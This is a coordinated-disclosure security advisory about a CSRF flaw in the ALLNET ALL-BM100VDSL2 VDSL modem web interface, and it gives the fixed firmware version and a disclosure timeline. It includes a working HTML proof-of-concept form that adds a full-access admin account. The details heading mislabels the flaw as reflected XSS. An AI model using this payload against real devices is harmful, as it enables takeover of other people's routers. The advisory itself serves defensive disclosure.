VDSL Client Modem ALL-BM100VDSL2: CSRF
Date: 2017-05-09 13:40:211. Introduction
| Affected Product: | VDSL Client Modem ALL-BM100VDSL2 C.4.6a |
| Fixed in: | C.4.8a |
| Fixed Version Link: | http://www.allnet.de/nc/de/allnet-brand/support/treiber-firmware/download/120183/ |
| Vendor Website: | http://www.allnet.de/ |
| Vulnerability Type: | CSRF |
| Remote Exploitable: | Yes |
| Reported to vendor: | 12/20/2016 |
| Disclosed to public: | 04/13/2017 |
| Release mode: | Coordinated Release |
| CVE: | n/a (not requested) |
| Credits | Tim Coen & Marcus Gruber of Curesec GmbH |
2. Overview
The web interface of the VDSL Client Modem ALL-BM100VDSL2 is vulnerable to CSRF.
3. Details
Reflected XSS
CVSS: High 8.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Description: The web interface does not have any CSRF protection. It is for example possible to add a new admin user with full access.
Proof of Concept:
<html> <body> <form action="http://192.168.16.254/goform/ifx_set_system_password" method="POST"> <input type="hidden" name="page" value="system_password.htm" /> <input type="hidden" name="curr_user_id" value="1" /> <input type="hidden" name="submitflag" value="1" /> <input type="hidden" name="users" value="<New User>" /> <input type="hidden" name="userEnable" value="1" /> <input type="hidden" name="userNew" value="admin2" /> <input type="hidden" name="user_passwd_edit_enable" value="1" /> <input type="hidden" name="userNewPswd" value="admin" /> <input type="hidden" name="userConPswd" value="admin" /> <input type="hidden" name="userLaccess" value="1" /> <input type="hidden" name="userRaccess" value="1" /> <input type="hidden" name="userFTPaccess" value="1" /> <input type="hidden" name="userSMBaccess" value="1" /> <input type="submit" value="Submit request" /> </form> </body> </html>
4. Solution
To mitigate this issue please upgrade at least to version C.4.8a:
http://www.allnet.de/nc/de/allnet-brand/support/treiber-firmware/download/120183/
Please note that a newer version might already be available.
5. Report Timeline
| 12/20/2016 | Informed Vendor about Issue |
| 12/23/2016 | Vendor announces release of new firmware |
| 02/15/2017 | Reminded Vendor about disclosure date |
| 03/01/2017 | Vendor releases new Version |
| 04/13/2017 | Disclosed to public |